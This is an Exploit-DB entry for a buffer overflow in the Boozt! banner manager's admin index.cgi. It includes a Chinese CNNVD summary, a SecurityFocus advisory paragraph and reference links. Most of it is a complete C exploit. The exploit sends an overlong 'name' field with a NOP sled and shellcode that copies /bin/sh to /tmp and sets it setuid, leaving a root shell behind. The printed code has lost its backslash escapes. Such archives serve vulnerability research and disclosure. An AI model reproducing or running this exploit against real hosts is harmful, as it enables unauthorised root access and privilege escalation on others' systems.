https://www.exploit-db.com/exploits/21205
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200203-058

Boozt!是Linux平台下一个广告条管理软件。Boozt!软件存在缓冲区溢出漏洞，可以使远程攻击者在运行Boozt!的主机上执行任意指令。当用户通过管理界面的index.cgi创建一个新的广告条时，在名字字段中输入超长的字串会导致程序缓冲区溢出，从而使执行任意指令或造成拒绝服务攻击成为可能。

source: http://www.securityfocus.com/bid/3787/info

Boozt! is a free open source banner management software for Linux hosts.

An issue has been reported which could allow for a user to execute arbitrary code on a Boozt! host.

This is acheivable when a Boozt! user attempts to create a new banner, if the name field is specified with arbitrary characters of excessive length a buffer overflow occurs. 

/* -----------------------------------------

        BOOZT! Standard 0.9.8 CGI vulnerability exploit

        Rafael San Miguel Carrasco

        [email protected]

   -----------------------------------------  */


#include <netinet/in.h>
#define PORT 8080
#define BUFLEN 1597
#define RET 0xbffff297
#define NOP 0x90

int main (int argc, char **argv) {

        int sockfd, i, cont;
        struct sockaddr_in dest;
        int html_len = 15;
        char cgicontent[2048];
        char buf[BUFLEN];

        char shellcode[]=
               
"x29xc0xb0x02xcdx80x85xc0x75x02xebx05x29xc0x40xcdx80x29xc0x29xdbx29xc9"
               
"xb0x46xcdx80xebx2ax5ex89x76x32x8dx5ex08x89x5ex36x8dx5ex0bx89x5ex3ax29"
               
"xc0x88x46x07x88x46x0ax88x46x31x89x46x3ex87xf3xb0x0bx8dx4bx32x8dx53x3e"
               
"xcdx80xe8xd1xffxffxffx2fx62x69x6ex2fx73x68x20x2dx63x20x63x70x20x2fx62x69x6e"
               
"x2fx73x68x20x2fx74x6dx70x2fx73x68x3bx20x63x68x6dx6fx64x20x34x37x35x35x20"
                "x2fx74x6dx70x2fx73x68";

        char *html[15] = {
                "POST /cgi-bin/boozt/admin/index.cgi HTTP/1.0n",
                "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
*/*n",
                "Referer:
http://10.0.0.1:8080/cgi-bin/boozt/admin/index.cgi?section=5&input=1n",
                "Accept-Language: es, enn",
                "Content-Type: application/x-www-form-urlencodedn",
                "UA-pixels: 640x480n",
                "UA-color: color8n",
                "UA-OS: Windows 95n",
                "UA-CPU: x86n",
                "User-Agent: Mozilla/2.0 (compatible; MSIE 3.0; Windows 95)n",
                "Host: 10.0.0.1:8080n",
                "Connection: Keep-Aliven",
                "Content-Length: 1776n",
                "Pragma: No-Cachen",
                "n",
        };

        if (argc < 2) {
                printf ("usage: %s <IP>n", argv[0]);
                exit (-1);
        }

        printf ("----------n");
        printf (" BOOZT! Standard exploitn");
        printf ("----------n");
        printf ("Rafael San Miguel Carrasco (_kiss_)n");
        printf ("[email protected]");
        printf ("----------n");

        for (i = 0; i < BUFLEN; i+=4)
                *( (long *) &buf[i]) = RET;

        for (i = 0; i < (BUFLEN - 16); i++)
                buf[i] = NOP;


        cont = 0;

        for (i = (BUFLEN - strlen (shellcode) - 16); i < (BUFLEN - 16); i++)
                buf[i] = shellcode [cont++];

        strcpy (cgicontent, "name=");
        strncat (cgicontent, buf, sizeof (buf));
        strcat (cgicontent,
"&target=&alt_text=&id_size=1&type=image&source=&source_path=Browse...&source_flash=&source_flash_path=Browse...&script_name=&input=
1&section=5&sent=1&submit=Create+New+Banner");

        printf ("connecting ...n");

        if ( (sockfd = socket (AF_INET, SOCK_STREAM, 0)) < 0) {
                perror ("socket");
                exit (-1);
        }

        bzero (&dest, sizeof (dest));
        dest.sin_family = AF_INET;
        dest.sin_port = htons (PORT);
        dest.sin_addr.s_addr = inet_addr (argv[1]);

        if (connect (sockfd, &dest, sizeof (dest)) < 0) {
                perror ("connect");
                exit (-1);
        }

        printf ("connected. sending buffer ...n");

        for (i = 0; i < html_len; i++) {

                if (write (sockfd, html[i], strlen(html[i])) < strlen(html[i]))
{
                        perror ("write");
                        exit (-1);
                }
        }

        if (write (sockfd, cgicontent, strlen(cgicontent)) < strlen(cgicontent))
{
                perror ("write cgicontent");
                exit (-1);
        }

        if (close (sockfd) < 0) {
                perror ("close");
                exit (-1);
        }

        printf ("there should be a rootshell in /tmp.nn");

        return 0;
}

来源:BID
名称:3787
链接:http://online.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id;=3787
来源:XF
名称:boozt-long-name-bo(7790)
链接:http://www.iss.net/security_center/static/7790.php
来源:www.boozt.com
链接:http://www.boozt.com/news_detail.php?id=3
来源:BUGTRAQ
名称:20020109BOOZT!StandardCGIVulnerability:ExploitReleased
链接:http://online.securityfocus.com/archive/1/249219
来源:BUGTRAQ
名称:20020105BOOZT!Standard’sadministrationcgivulnerabletobufferoverflow
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=101027773404836&w;=2